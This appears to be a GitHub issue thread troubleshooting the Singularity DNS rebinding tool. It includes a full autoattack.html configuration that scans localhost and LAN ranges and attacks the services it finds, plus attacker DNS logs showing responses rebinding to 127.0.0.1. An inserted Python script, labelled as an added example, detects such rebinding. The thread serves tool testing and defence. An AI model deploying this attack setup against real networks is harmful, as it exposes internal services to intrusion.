autoattack.html trying to fetch soopayload.html on target #46

Open
dellarte opened this issue Feb 18, 2022 · 8 comments
Comments

@dellarte

Hi,

I tried to test my simple Python app on port 8080 on localhost.
I own a domain and a subdomain for this attack.
When I try to load the URL http://rebind.mydomain/autoattack.html, the rebinding DNS is working, but the simple payload tries to fetch my simple Python service with GET /soopayload.html, which leads to a 404...
I set up my config following this video:
https://www.youtube.com/watch?v=R5Y1luRhjbc

```html
<!doctype html>
<html lang="en">
<head>
    <title>Singularity of Origin DNS Rebinding Automatic Attack</title>
    <script src="manager.js"></script>
    <script src=scan-manager.js></script>
    <meta charset="utf-8">
    <meta http-equiv="x-dns-prefetch-control" content="off">
</head>
<body id="body" style="display: none">
    The home page of vulnerable services will be dumped in the browser developer console.
    <script>
        const configuration = {
            attackHostIPAddress: 'X.X.X.X', //my singularity web server 
            attackHostDomain: 'dynamic.mydomain', //which is NS entry 
            rebindingStrategy: 'ma',
            attackPayload: 'Simple Fetch Get',
            interval: "1",
            flushDns: false,
            indexToken: "<!--thisismytesttoken-->",
            wsProxyPort: 3129,
            hideActivity: false,
            delayDOMLoad: false,
        };
        configuration.rebindingSuccessFn = (msg) => {
            console.log(`Iframe reports attack successful for ${msg.origin}\n${msg.data.response}`);
        }
        app.getConfiguration().setManually(configuration);
        let addrSpec = `0.0.0.0`; // this is a Linux Host
        let searchForMoreAddresses = false;
        const portSpec = '8080'; // python simple server port
        function scanFoundNewTargetCb(result) {
            console.log(result);
            document.getElementById("activity").innerHTML += JSON.stringify(result, null, 4) + "<br/>";
            app.attackTarget(result.target.address.replace("-", "--"), result.target.port, true);
        }
        function scanDoneCb(results) {
            document.getElementById("activity").innerHTML += "Done.<br/>";
            setTimeout(function () {
                sm.shutDown();
            }, 3000);
            setTimeout(function () {
                delaydomloadframe.src = "about:blank";
            }, 90000);
        }
        async function getLocalIpAddressesThenScan() {
            sm = ScanManager();
            const externalAddress = await getMyExternalIpAddress();
            addrSpec = `${addrSpec},${externalAddress}`;
            getLocalIpAddress()
                .then(address => {
                    const range = `${address.split('.', 3).join('.')}.1-254`;
                    sm.run(`${addrSpec},${range}`, portSpec, scanFoundNewTargetCb, scanDoneCb);
                },
                    e => {
                        console.log(e);
                        sm.run(`${addrSpec},192.168.1.1-254`, portSpec, scanFoundNewTargetCb, scanDoneCb);
                    })
        }
        if (searchForMoreAddresses === true) {
            getLocalIpAddressesThenScan();
        } else {
            sm = ScanManager();
            sm.run(`${addrSpec}`, portSpec, scanFoundNewTargetCb, scanDoneCb);
        }
    </script>
    <h3>Scanning Progress</h3>
    <div id="activity"></div>
    <h3>DNS Rebinding Progress</h3>
    <div id=attackframes></div>
    <iframe id=delaydomloadframe src="/delaydomload" style="display: none"></iframe>
</body>
</html>
```

And this is the output of my Python server:

```
127.0.0.1 - - [18/Feb/2022 19:37:59] code 404, message File not found
127.0.0.1 - - [18/Feb/2022 19:37:59] "GET /soopayload.html?rnd=0.5606337505134109 HTTP/1.1" 404 -
127.0.0.1 - - [18/Feb/2022 19:38:00] code 404, message File not found
127.0.0.1 - - [18/Feb/2022 19:38:00] "GET /soopayload.html?rnd=0.5606337505134109 HTTP/1.1" 404 -
127.0.0.1 - - [18/Feb/2022 19:38:01] code 404, message File not found
127.0.0.1 - - [18/Feb/2022 19:38:01] "GET /soopayload.html?rnd=0.5606337505134109 HTTP/1.1" 404 -
127.0.0.1 - - [18/Feb/2022 19:38:02] code 404, message File not found
127.0.0.1 - - [18/Feb/2022 19:38:02] "GET /soopayload.html?rnd=0.5606337505134109 HTTP/1.1" 404 -
127.0.0.1 - - [18/Feb/2022 19:38:04] code 404, message File not found
127.0.0.1 - - [18/Feb/2022 19:38:04] "GET /soopayload.html?rnd=0.5606337505134109 HTTP/1.1" 404 -
127.0.0.1 - - [18/Feb/2022 19:38:05] code 404, message File not found
127.0.0.1 - - [18/Feb/2022 19:38:05] "GET /soopayload.html?rnd=0.5606337505134109 HTTP/1.1" 404 -
127.0.0.1 - - [18/Feb/2022 19:38:06] code 404, message File not found
127.0.0.1 - - [18/Feb/2022 19:38:06] "GET /soopayload.html?rnd=0.5606337505134109 HTTP/1.1" 404 -
```

@sanktjodel
Collaborator

  • Did you try to perform a manual DNS rebinding attack using the default "First then second" rebinding strategy with the Singularity Manager web interface (/manager.html)?
  • Did you update the attackHostIPAddress and attackHostDomain in the autoattack.html file?
  • What browser and OS are you using?
  • The output from the browser console log would help us see what is happening.

@tomverrecktecheib

@sanktjodel: The same behavior here while testing "Hook and Control". When I replace/set `.replace("%7", ''));` in manager.js on line 551, then Singularity queries for / instead of soopayload.html, which doesn't exist.

Currently, "Hook and Control" is not working, because I don't see any session on the soohooked backend. Any hints for this?

@sanktjodel
Collaborator

@tomverrecktecheib Can you please confirm that a basic DNS rebinding using the default "First then second" rebinding strategy worked? What browser and OS are you using?

@tomverrecktecheib

@sanktjodel: Yes, basic DNS rebinding using the default "First then second" works, but throws a 404, because it queries for /soopayload.html?rnd=0....., and this file doesn't exist on the victim side. It's working too with "Multiple answers".

I started an httpd on the victim on 127.0.0.1 and created a simple HTML file called soopayload.html, which was then successfully queried (and then the correct /index.html was also shown), but I wasn't able to see a websocket session on the soohooked proxy.

On the victim:
Linux Firefox 113.0.1 (64-bit)

On the attacker:
Linux Chrome Version 113.0.5672.92 (Official Build) (64-bit)

Thank you.

@sanktjodel
Collaborator

It sounds like the DNS rebinding was not successful. Did you try the default "First then second" rebinding strategy with the Simple Fetch Get payload using the Singularity manager interface instead of Hook and Control? It would also help if you could show the browser console output and the server log.

@tomverrecktecheib

tomverrecktecheib commented May 17, 2023

@sanktjodel: I tried with "Simple Fetch Get" and on the victim's manager.html I'm able to see the /index.html, AFTER I touched a plain soopayload.html. If I skip the soopayload.html, then I just see a 404 until I modify line 551 in manager.js (see above).

Victim's console:

```
This page is in Quirks Mode. Page layout may be impacted. For Standards Mode use “<!DOCTYPE html>”. soopayload.html
[NoScript]:0 Prompt Hook installation http://s-11.22.33.44-127.0.0.1-1573416675-fs-e.dynamic.example.ch/soopayload.html?rnd=0.07991582348435888 log.js:32:13
This page is in Quirks Mode. Page layout may be impacted. For Standards Mode use “<!DOCTYPE html>”. soopayload.html
[NoScript]:0 Prompt Hook installation http://s-11.22.33.44-127.0.0.1-1573416675-fs-e.dynamic.example.ch/soopayload.html?rnd=0.07991582348435888 log.js:32:13
This page is in Quirks Mode. Page layout may be impacted. For Standards Mode use “<!DOCTYPE html>”. soopayload.html
[NoScript]:0 Prompt Hook installation http://s-11.22.33.44-127.0.0.1-1573416675-fs-e.dynamic.example.ch/soopayload.html?rnd=0.07991582348435888 log.js:32:13
This page is in Quirks Mode. Page layout may be impacted. For Standards Mode use “<!DOCTYPE html>”. soopayload.html
[NoScript]:0 Prompt Hook installation http://s-11.22.33.44-127.0.0.1-1573416675-fs-e.dynamic.example.ch/soopayload.html?rnd=0.07991582348435888 log.js:32:13
This page is in Quirks Mode. Page layout may be impacted. For Standards Mode use “<!DOCTYPE html>”. soopayload.html
[NoScript]:0 Prompt Hook installation http://s-11.22.33.44-127.0.0.1-1573416675-fs-e.dynamic.example.ch/soopayload.html?rnd=0.07991582348435888 log.js:32:13
This page is in Quirks Mode. Page layout may be impacted. For Standards Mode use “<!DOCTYPE html>”. soopayload.html
[NoScript]:0 Prompt Hook installation http://s-11.22.33.44-127.0.0.1-1573416675-fs-e.dynamic.example.ch/soopayload.html?rnd=0.07991582348435888 log.js:32:13
```

Server's console:

```
2023/05/17 08:00:14 Main: Starting DNS Server at 53
2023/05/17 08:00:14 HTTP: starting HTTP Server on :8080
2023/05/17 08:00:14 HTTP: starting HTTP Websockets/Proxy Server on :3129
2023/05/17 08:00:43 DNS: Received A query: s-11.22.33.44-127.0.0.1-1573416675-fs-e.dynamic.example.ch. from: 88.88.88.88:52467
2023/05/17 08:00:43 DNS: Parsed query: &{11.22.33.44 127.0.0.1 1573416675 fs .dynamic.example.ch.}
2023/05/17 08:00:43 DNS: session exists: false
2023/05/17 08:00:43 DNS: in DNSRebindFromQueryFirstThenSecond
2023/05/17 08:00:43 DNS: response: s-11.22.33.44-127.0.0.1-1573416675-fs-e.dynamic.example.ch. 0 IN A 11.22.33.44
2023/05/17 08:01:03 DNS: Received A query: s-11.22.33.44-127.0.0.1-1573416675-fs-e.dynamic.example.ch. from: 88.88.88.88:43826
2023/05/17 08:01:03 DNS: Parsed query: &{11.22.33.44 127.0.0.1 1573416675 fs .dynamic.example.ch.}
2023/05/17 08:01:03 DNS: session exists: true
2023/05/17 08:01:03 DNS: in DNSRebindFromQueryFirstThenSecond
2023/05/17 08:01:03 DNS: response: s-11.22.33.44-127.0.0.1-1573416675-fs-e.dynamic.example.ch. 0 IN A 127.0.0.1
2023/05/17 08:01:06 DNS: Received A query: s-11.22.33.44-127.0.0.1-1573416675-fs-e.dynamic.example.ch. from: 88.88.88.88:46790
2023/05/17 08:01:06 DNS: Parsed query: &{11.22.33.44 127.0.0.1 1573416675 fs .dynamic.example.ch.}
2023/05/17 08:01:06 DNS: session exists: true
2023/05/17 08:01:06 DNS: in DNSRebindFromQueryFirstThenSecond
2023/05/17 08:01:06 DNS: response: s-11.22.33.44-127.0.0.1-1573416675-fs-e.dynamic.example.ch. 0 IN A 127.0.0.1
2023/05/17 08:01:23 DNS: Received A query: s-11.22.33.44-127.0.0.1-1573416675-fs-e.dynamic.example.ch. from: 88.88.88.88:53870
2023/05/17 08:01:23 DNS: Parsed query: &{11.22.33.44 127.0.0.1 1573416675 fs .dynamic.example.ch.}
2023/05/17 08:01:23 DNS: session exists: true
2023/05/17 08:01:23 DNS: in DNSRebindFromQueryFirstThenSecond
2023/05/17 08:01:23 DNS: response: s-11.22.33.44-127.0.0.1-1573416675-fs-e.dynamic.example.ch. 0 IN A 127.0.0.1
2023/05/17 08:01:43 DNS: Received A query: s-11.22.33.44-127.0.0.1-1573416675-fs-e.dynamic.example.ch. from: 88.88.88.88:34152
2023/05/17 08:01:43 DNS: Parsed query: &{11.22.33.44 127.0.0.1 1573416675 fs .dynamic.example.ch.}
2023/05/17 08:01:43 DNS: session exists: true
2023/05/17 08:01:43 DNS: in DNSRebindFromQueryFirstThenSecond
2023/05/17 08:01:43 DNS: response: s-11.22.33.44-127.0.0.1-1573416675-fs-e.dynamic.example.ch. 0 IN A 127.0.0.1
2023/05/17 08:02:03 DNS: Received A query: s-11.22.33.44-127.0.0.1-1573416675-fs-e.dynamic.example.ch. from: 88.88.88.88:38702
2023/05/17 08:02:03 DNS: Parsed query: &{11.22.33.44 127.0.0.1 1573416675 fs .dynamic.example.ch.}
2023/05/17 08:02:03 DNS: session exists: true
2023/05/17 08:02:03 DNS: in DNSRebindFromQueryFirstThenSecond
2023/05/17 08:02:03 DNS: response: s-11.22.33.44-127.0.0.1-1573416675-fs-e.dynamic.example.ch. 0 IN A 127.0.0.1
2023/05/17 08:02:04 DNS: Received A query: s-11.22.33.44-127.0.0.1-1573416675-fs-e.dynamic.example.ch. from: 88.88.88.88:53014
2023/05/17 08:02:04 DNS: Parsed query: &{11.22.33.44 127.0.0.1 1573416675 fs .dynamic.example.ch.}
2023/05/17 08:02:04 DNS: session exists: true
2023/05/17 08:02:04 DNS: in DNSRebindFromQueryFirstThenSecond
2023/05/17 08:02:04 DNS: response: s-11.22.33.44-127.0.0.1-1573416675-fs-e.dynamic.example.ch. 0 IN A 127.0.0.1
2023/05/17 08:02:06 DNS: Received A query: s-11.22.33.44-127.0.0.1-1573416675-fs-e.dynamic.example.ch. from: 88.88.88.88:59449
2023/05/17 08:02:06 DNS: Parsed query: &{11.22.33.44 127.0.0.1 1573416675 fs .dynamic.example.ch.}
2023/05/17 08:02:06 DNS: session exists: true
2023/05/17 08:02:06 DNS: in DNSRebindFromQueryFirstThenSecond
2023/05/17 08:02:06 DNS: response: s-11.22.33.44-127.0.0.1-1573416675-fs-e.dynamic.example.ch. 0 IN A 127.0.0.1
2023/05/17 08:02:23 DNS: Received A query: s-11.22.33.44-127.0.0.1-1573416675-fs-e.dynamic.example.ch. from: 88.88.88.88:38764
2023/05/17 08:02:23 DNS: Parsed query: &{11.22.33.44 127.0.0.1 1573416675 fs .dynamic.example.ch.}
2023/05/17 08:02:23 DNS: session exists: true
2023/05/17 08:02:23 DNS: in DNSRebindFromQueryFirstThenSecond
2023/05/17 08:02:23 DNS: response: s-11.22.33.44-127.0.0.1-1573416675-fs-e.dynamic.example.ch. 0 IN A 127.0.0.1
2023/05/17 08:02:43 DNS: Received A query: s-11.22.33.44-127.0.0.1-1573416675-fs-e.dynamic.example.ch. from: 88.88.88.88:41427
2023/05/17 08:02:43 DNS: Parsed query: &{11.22.33.44 127.0.0.1 1573416675 fs .dynamic.example.ch.}
2023/05/17 08:02:43 DNS: session exists: true
2023/05/17 08:02:43 DNS: in DNSRebindFromQueryFirstThenSecond
2023/05/17 08:02:43 DNS: response: s-11.22.33.44-127.0.0.1-1573416675-fs-e.dynamic.example.ch. 0 IN A 127.0.0.1
2023/05/17 08:03:03 DNS: Received A query: s-11.22.33.44-127.0.0.1-1573416675-fs-e.dynamic.example.ch. from: 88.88.88.88:50440
2023/05/17 08:03:03 DNS: Parsed query: &{11.22.33.44 127.0.0.1 1573416675 fs .dynamic.example.ch.}
2023/05/17 08:03:03 DNS: session exists: true
2023/05/17 08:03:03 DNS: in DNSRebindFromQueryFirstThenSecond
2023/05/17 08:03:03 DNS: response: s-11.22.33.44-127.0.0.1-1573416675-fs-e.dynamic.example.ch. 0 IN A 127.0.0.1
2023/05/17 08:03:04 DNS: Received A query: s-11.22.33.44-127.0.0.1-1573416675-fs-e.dynamic.example.ch. from: 88.88.88.88:40154
2023/05/17 08:03:04 DNS: Parsed query: &{11.22.33.44 127.0.0.1 1573416675 fs .dynamic.example.ch.}
2023/05/17 08:03:04 DNS: session exists: true
2023/05/17 08:03:04 DNS: in DNSRebindFromQueryFirstThenSecond
2023/05/17 08:03:04 DNS: response: s-11.22.33.44-127.0.0.1-1573416675-fs-e.dynamic.example.ch. 0 IN A 127.0.0.1
2023/05/17 08:03:23 DNS: Received A query: s-11.22.33.44-127.0.0.1-1573416675-fs-e.dynamic.example.ch. from: 88.88.88.88:58517
2023/05/17 08:03:23 DNS: Parsed query: &{11.22.33.44 127.0.0.1 1573416675 fs .dynamic.example.ch.}
2023/05/17 08:03:23 DNS: session exists: true
2023/05/17 08:03:23 DNS: in DNSRebindFromQueryFirstThenSecond
2023/05/17 08:03:23 DNS: response: s-11.22.33.44-127.0.0.1-1573416675-fs-e.dynamic.example.ch. 0 IN A 127.0.0.1
2023/05/17 08:03:26 DNS: Received A query: s-11.22.33.44-127.0.0.1-1573416675-fs-e.dynamic.example.ch. from: 88.88.88.88:58155
2023/05/17 08:03:26 DNS: Parsed query: &{11.22.33.44 127.0.0.1 1573416675 fs .dynamic.example.ch.}
2023/05/17 08:03:26 DNS: session exists: true
2023/05/17 08:03:26 DNS: in DNSRebindFromQueryFirstThenSecond
2023/05/17 08:03:26 DNS: response: s-11.22.33.44-127.0.0.1-1573416675-fs-e.dynamic.example.ch. 0 IN A 127.0.0.1
2023/05/17 08:03:43 DNS: Received A query: s-11.22.33.44-127.0.0.1-1573416675-fs-e.dynamic.example.ch. from: 88.88.88.88:34359
2023/05/17 08:03:43 DNS: Parsed query: &{11.22.33.44 127.0.0.1 1573416675 fs .dynamic.example.ch.}
2023/05/17 08:03:43 DNS: session exists: true
2023/05/17 08:03:43 DNS: in DNSRebindFromQueryFirstThenSecond
2023/05/17 08:03:43 DNS: response: s-11.22.33.44-127.0.0.1-1573416675-fs-e.dynamic.example.ch. 0 IN A 127.0.0.1
2023/05/17 08:04:03 DNS: Received A query: s-11.22.33.44-127.0.0.1-1573416675-fs-e.dynamic.example.ch. from: 88.88.88.88:51854
2023/05/17 08:04:03 DNS: Parsed query: &{11.22.33.44 127.0.0.1 1573416675 fs .dynamic.example.ch.}
2023/05/17 08:04:03 DNS: session exists: true
2023/05/17 08:04:03 DNS: in DNSRebindFromQueryFirstThenSecond
2023/05/17 08:04:03 DNS: response: s-11.22.33.44-127.0.0.1-1573416675-fs-e.dynamic.example.ch. 0 IN A 127.0.0.1
2023/05/17 08:04:23 DNS: Received A query: s-11.22.33.44-127.0.0.1-1573416675-fs-e.dynamic.example.ch. from: 88.88.88.88:55928
2023/05/17 08:04:23 DNS: Parsed query: &{11.22.33.44 127.0.0.1 1573416675 fs .dynamic.example.ch.}
2023/05/17 08:04:23 DNS: session exists: true
2023/05/17 08:04:23 DNS: in DNSRebindFromQueryFirstThenSecond
2023/05/17 08:04:23 DNS: response: s-11.22.33.44-127.0.0.1-1573416675-fs-e.dynamic.example.ch. 0 IN A 127.0.0.1
2023/05/17 08:04:24 DNS: Received A query: s-11.22.33.44-127.0.0.1-1573416675-fs-e.dynamic.example.ch. from: 88.88.88.88:40233
2023/05/17 08:04:24 DNS: Parsed query: &{11.22.33.44 127.0.0.1 1573416675 fs .dynamic.example.ch.}
2023/05/17 08:04:24 DNS: session exists: true
2023/05/17 08:04:24 DNS: in DNSRebindFromQueryFirstThenSecond
2023/05/17 08:04:24 DNS: response: s-11.22.33.44-127.0.0.1-1573416675-fs-e.dynamic.example.ch. 0 IN A 127.0.0.1
2023/05/17 08:04:43 DNS: Received A query: s-11.22.33.44-127.0.0.1-1573416675-fs-e.dynamic.example.ch. from: 88.88.88.88:37899
2023/05/17 08:04:43 DNS: Parsed query: &{11.22.33.44 127.0.0.1 1573416675 fs .dynamic.example.ch.}
2023/05/17 08:04:43 DNS: session exists: true
2023/05/17 08:04:43 DNS: in DNSRebindFromQueryFirstThenSecond
2023/05/17 08:04:43 DNS: response: s-11.22.33.44-127.0.0.1-1573416675-fs-e.dynamic.example.ch. 0 IN A 127.0.0.1
2023/05/17 08:04:46 DNS: Received A query: s-11.22.33.44-127.0.0.1-1573416675-fs-e.dynamic.example.ch. from: 88.88.88.88:39298
2023/05/17 08:04:46 DNS: Parsed query: &{11.22.33.44 127.0.0.1 1573416675 fs .dynamic.example.ch.}
2023/05/17 08:04:46 DNS: session exists: true
2023/05/17 08:04:46 DNS: in DNSRebindFromQueryFirstThenSecond
2023/05/17 08:04:46 DNS: response: s-11.22.33.44-127.0.0.1-1573416675-fs-e.dynamic.example.ch. 0 IN A 127.0.0.1
```

What is the purpose of soopayload.html, and why is this file queried by "Simple Fetch Get" and "Hook and Control" although it doesn't exist on the victim's system? And what could be the reason that I'm not able to see the session on the websocket proxy?

Thank you.

@gdncc
Collaborator

gdncc commented May 17, 2023

If you see a request for resource "soopayload.html" on the target service, it means that DNS rebinding did not happen successfully in all likelihood. Specifically, using "Simple Fetch Get" with "First then Second" in "autoattack.html" should dump the index page of the target service in the victim's browser. Similarly using "Simple Fetch Get" with "First then Second" in the interactive manager interface should generate an alert box with the contents of the target service index page. If these simple tests do not work, then "Hook and Control" will not succeed. Deploying a "soopayload.html" file with any contents on the target service will not solve the issue.
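The reply above turns the server log into a diagnostic: a session is rebound only when the name is first answered with the attacker's public address and afterwards with the internal target. The following is an added example, not part of the issue or of Singularity's code; it parses the "DNS: response:" lines in the log format quoted above (hostname layout `s-<attacker>-<target>-<session>-<strategy>-e.<domain>.`, IPv4 only, with the sample log constructed here) and reports, per session, whether that public-to-internal switch actually happened.

```python
import ipaddress
import re
from collections import OrderedDict

# Constructed sample in the format of the Singularity server log quoted above:
# one session that rebinds to loopback after the first answer, and one that never does.
SAMPLE_LOG = """\
2023/05/17 08:00:43 DNS: response: s-11.22.33.44-127.0.0.1-1573416675-fs-e.dynamic.example.ch. 0 IN A 11.22.33.44
2023/05/17 08:01:03 DNS: response: s-11.22.33.44-127.0.0.1-1573416675-fs-e.dynamic.example.ch. 0 IN A 127.0.0.1
2023/05/17 08:01:06 DNS: response: s-11.22.33.44-127.0.0.1-1573416675-fs-e.dynamic.example.ch. 0 IN A 127.0.0.1
2023/05/17 08:05:00 DNS: response: s-11.22.33.44-10.0.0.5-999-fs-e.dynamic.example.ch. 0 IN A 11.22.33.44
"""

# "<date> <time> DNS: response: <name> <ttl> IN A <ip>"
RESPONSE_RE = re.compile(r"^\S+ \S+ DNS: response: (?P<name>\S+) \d+ IN A (?P<ip>\S+)$")
# s-<attacker>-<target>-<session>-<strategy>-e.<domain>.  (IPv4 targets only; autoattack.html
# writes IPv6 targets with "--", which this simple split does not handle)
NAME_RE = re.compile(
    r"^s-(?P<attacker>[^-]+)-(?P<target>[^-]+)-(?P<session>[^-]+)-(?P<strategy>[^-]+)-e\.(?P<domain>.+)\.$"
)


def parse_name(name):
    """Split a Singularity rebinding hostname into its fields, or None if it does not match."""
    m = NAME_RE.match(name)
    return m.groupdict() if m else None


def answers_by_session(log_text):
    """Collect the A-record answers per session id, in log order."""
    sessions = OrderedDict()
    for line in log_text.splitlines():
        m = RESPONSE_RE.match(line)
        if not m:
            continue
        q = parse_name(m["name"])
        if q is None:
            continue
        sessions.setdefault(q["session"], {"query": q, "answers": []})
        sessions[q["session"]]["answers"].append(m["ip"])
    return sessions


def is_internal(ip):
    """Loopback, RFC 1918 and link-local addresses are the rebinding targets worth flagging."""
    a = ipaddress.ip_address(ip)
    return a.is_loopback or a.is_private or a.is_link_local


def detect_rebinds(log_text):
    """Map session id -> True when the first answer was public and a later one internal."""
    result = {}
    for sid, s in answers_by_session(log_text).items():
        ans = s["answers"]
        result[sid] = (len(ans) >= 2 and not is_internal(ans[0])
                       and any(is_internal(a) for a in ans[1:]))
    return result


if __name__ == "__main__":
    for sid, hit in detect_rebinds(SAMPLE_LOG).items():
        print(sid, "rebound to internal address" if hit else "no rebind seen")
```

A session that stays on the attacker's address, as the second constructed session does, is what you would see while the browser is still fetching soopayload.html from the attack host rather than the target.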

@tomverrecktecheib

Hi @gdncc, @sanktjodel
Problem solved. I had the server running on Go <1.20. Now, after upgrading Go to 1.20.4, everything works as designed. Many thanks for your help, and sorry for not reading the requirements correctly ;-).
